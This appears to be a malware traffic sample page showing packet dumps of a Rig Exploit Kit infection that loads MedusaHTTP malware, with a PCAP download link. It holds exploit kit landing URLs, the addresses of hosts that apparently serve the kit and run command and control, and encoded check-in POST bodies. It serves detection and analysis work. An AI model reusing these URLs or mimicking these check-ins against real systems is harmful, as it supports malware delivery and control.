Text Example

Rig Exploit Kit EK Loads MedusaHTTP Malware Trojan Backdoor Flash Exploit PCAP File Download Traffic Sample

Download Attachments

2019-08-12 16:57:48.518525 IP 10.8.12.101.49158 > 188.225.37.115.80: Flags [P.], seq 1:737, ack 1, win 64240, length 736: HTTP: GET /?ODE2NTA=&aAxgMQgI&fhoaCukK=difference&ZVWHUl=heartfelt&GpNuBWSc=strategy&GuxiOH=already&IhrRqTdNT=heartfelt&PoKpUSKLK=golfer&wZzWF=perpetual&OAGiuQ=community&EIYoYThI=heartfelt&rClHTGxUX=community&tqqvPaqsy=constitution&lJHtbzKVC=wrapped&tUkJD=wrapped&cmYxKg=referred&ffhdtdf3s=xHjQMrfYbRfFFYrfKPPEUKNEMUnWA06KwYeZhajVF5mxFDHGpbv1FxTspVWdCFSEmvpvdLUHIwWh1UPA&zUugkiAM=detonator&t4gdfgdgf4=SwMzmIZdB1wb8K742kfSyRHIgp_T-BKPYwxB-JqTQbZvjVqkmbhHd8JyxBCB72kGzuMtYlwgpQxR2afI&NCXtqqIJMzUwNDg0 HTTP/1.1
E….H@…..
..e..%s…P..R’….P…!…GET /?ODE2NTA=&aAxgMQgI&fhoaCukK=difference&ZVWHUl=heartfelt&GpNuBWSc=strategy&GuxiOH=already&IhrRqTdNT=heartfelt&PoKpUSKLK=golfer&wZzWF=perpetual&OAGiuQ=community&EIYoYThI=heartfelt&rClHTGxUX=community&tqqvPaqsy=constitution&lJHtbzKVC=wrapped&tUkJD=wrapped&cmYxKg=referred&ffhdtdf3s=xHjQMrfYbRfFFYrfKPPEUKNEMUnWA06KwYeZhajVF5mxFDHGpbv1FxTspVWdCFSEmvpvdLUHIwWh1UPA&zUugkiAM=detonator&t4gdfgdgf4=SwMzmIZdB1wb8K742kfSyRHIgp_T-BKPYwxB-JqTQbZvjVqkmbhHd8JyxBCB72kGzuMtYlwgpQxR2afI&NCXtqqIJMzUwNDg0 HTTP/1.1
Accept: text/html, application/xhtml+xml, /
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 188.225.37.115
Connection: Keep-Alive

2019-08-12 16:57:48.518651 IP 188.225.37.115.80 > 10.8.12.101.49158: Flags [.], ack 737, win 64240, length 0
E..(.a….^…%s
..e.P……..U.P…. ..
2019-08-12 16:57:49.127786 IP 188.225.37.115.80 > 10.8.12.101.49158: Flags [P.], seq 1:1277, ack 737, win 64240, length 1276: HTTP: HTTP/1.1 200 OK
E..$.b….Y…%s
..e.P……..U.P…cL..HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Mon, 12 Aug 2019 20:57:46 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 45973
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip

2019-08-12 16:59:38.271526 IP 10.8.12.101.49167 > 176.119.29.14.80: Flags [P.], seq 1:269, ack 1, win 64240, length 268: HTTP: POST /forums/members/api.jsp HTTP/1.1
E..4..@…..
..e.w…..P.R.az.e.P….%..POST /forums/members/api.jsp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0
Host: cdnshop78.world
Content-Length: 192
Expect: 100-continue
Connection: Keep-Alive

2019-08-12 16:59:38.271686 IP 176.119.29.14.80 > 10.8.12.101.49167: Flags [.], ack 269, win 64240, length 0
E..(.b….o{.w..
..e.P..z.e..R.mP….O..
2019-08-12 16:59:38.626952 IP 10.8.12.101.49167 > 176.119.29.14.80: Flags [P.], seq 269:461, ack 1, win 64240, length 192: HTTP
E…..@….B
..e.w…..P.R.mz.e.P…….xyz=Jn72I3lUOoD6/K%2BBOVBU21CCWaMR0pT/MMMybhkcYzKf0Fxhd5iX/gM81s2/ry7/68WwIwZcdWQ6itJCp/2EjmcHZrxDMiwaQmK6aOtIdjcivuIb26kGZv0gTBGSgrc2LVstLUlWLVstMl4VcmXCxtXRM%2Bb999Q62gnpsw9gRcO404kDv36jb7g=
2019-08-12 16:59:38.627077 IP 176.119.29.14.80 > 10.8.12.101.49167: Flags [.], ack 461, win 64240, length 0
E..(.c….oz.w..
..e.P..z.e..R.-P…….
2019-08-12 16:59:38.701682 IP 176.119.29.14.80 > 10.8.12.101.49167: Flags [P.], seq 1:26, ack 461, win 64240, length 25: HTTP: HTTP/1.1 100 Continue
E..A.d….o`.w..
..e.P..z.e..R.-P…N[..HTTP/1.1 100 Continue

2019-08-12 16:59:38.807386 IP 10.8.12.101.49167 > 176.119.29.14.80: Flags [.], ack 26, win 64215, length 0
E..(..@…..
..e.w…..P.R.-z.f.P…….
2019-08-12 16:59:39.444787 IP 176.119.29.14.80 > 10.8.12.101.49167: Flags [P.], seq 26:381, ack 461, win 64240, length 355: HTTP: HTTP/1.1 404 Not Found
E….f….n..w..
..e.P..z.f..R.-P…)m..HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 13 Aug 2019 00:59:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.6.39

2019-08-12 16:57:48.518525 IP 10.8.12.101.49158 > 188.225.37.115.80: Flags [P.], seq 1:737, ack 1, win 64240, length 736: HTTP: GET /?ODE2NTA=&aAxgMQgI&fhoaCukK=difference&ZVWHUl=heartfelt&GpNuBWSc=strategy&GuxiOH=already&IhrRqTdNT=hea
rtfelt&PoKpUSKLK=golfer&wZzWF=perpetual&OAGiuQ=community&EIYoYThI=heartfelt&rClHTGxUX=community&tqqvPaqsy=constitution&lJHtbzKVC=wrapped&tUkJD=wrapped&cmYxKg=referred&ffhdtdf3s=xHjQMrfYbRfFFYrfKPPEUKNEMUnWA06KwYeZhajVF5mxFDHGpbv1FxTspV
WdCFSEmvpvdLUHIwWh1UPA&zUugkiAM=detonator&t4gdfgdgf4=SwMzmIZdB1wb8K742kfSyRHIgp_T-BKPYwxB-JqTQbZvjVqkmbhHd8JyxBCB72kGzuMtYlwgpQxR2afI&NCXtqqIJMzUwNDg0 HTTP/1.1
E….H@…..
..e..%s…P..R’….P…!…GET /?ODE2NTA=&aAxgMQgI&fhoaCukK=difference&ZVWHUl=heartfelt&GpNuBWSc=strategy&GuxiOH=already&IhrRqTdNT=heartfelt&PoKpUSKLK=golfer&wZzWF=perpetual&OAGiuQ=community&EIYoYThI=heartfelt&rClHTGxUX=community&tqqvP
aqsy=constitution&lJHtbzKVC=wrapped&tUkJD=wrapped&cmYxKg=referred&ffhdtdf3s=xHjQMrfYbRfFFYrfKPPEUKNEMUnWA06KwYeZhajVF5mxFDHGpbv1FxTspVWdCFSEmvpvdLUHIwWh1UPA&zUugkiAM=detonator&t4gdfgdgf4=SwMzmIZdB1wb8K742kfSyRHIgp_T-BKPYwxB-JqTQbZvjVqk
mbhHd8JyxBCB72kGzuMtYlwgpQxR2afI&NCXtqqIJMzUwNDg0 HTTP/1.1
Accept: text/html, application/xhtml+xml, /
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 188.225.37.115
Connection: Keep-Alive

2019-08-12 18:02:50.728872 IP 10.8.12.101.49205 > 195.22.26.248.80: Flags [P.], seq 246:434, ack 26, win 64215, length 188: HTTP
E….j@…./
..e…..5.P!p…)iiP…….xyz=Rdbf7Sz9YfcZXmTqimFyqnuXh9Qh2EokgRxWjlW6eKlVYMP/0Ie66coOHRDqh72wYWFpR4xyzrqwauM0ArlQyO1qB/flAxIl7E5s3wAGYyWQvmPGYIc2JkmQEzK0NIxSLVstLUlWLVst5B2FNeT80ZFfKTucqMUWcv06uvZYrUmVLNhFF/hGmbs=
2019-08-12 18:02:50.729083 IP 195.22.26.248.80 > 10.8.12.101.49205: Flags [.], ack 434, win 64240, length 0
E..(……K_….
..e.P.5.)ii!p.aP….~..
2019-08-12 18:02:50.900794 IP 195.22.26.248.80 > 10.8.12.101.49205: Flags [FP.], seq 26:283, ack 434, win 64240, length 257: HTTP: HTTP/1.1 200 OK
E..)……J]….
..e.P.5.)ii!p.aP….F..HTTP/1.1 200 OK
Server: nginx
Date: Mon, 12 Aug 2019 22:02:47 GMT
Content-Type: text/html
Connection: close
Set-Cookie: btst=98d119f0da644d3d3e6a3eec09296b9b|173.166.146.112|1565647367|1565647367|0|1|0; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT

Leave a Reply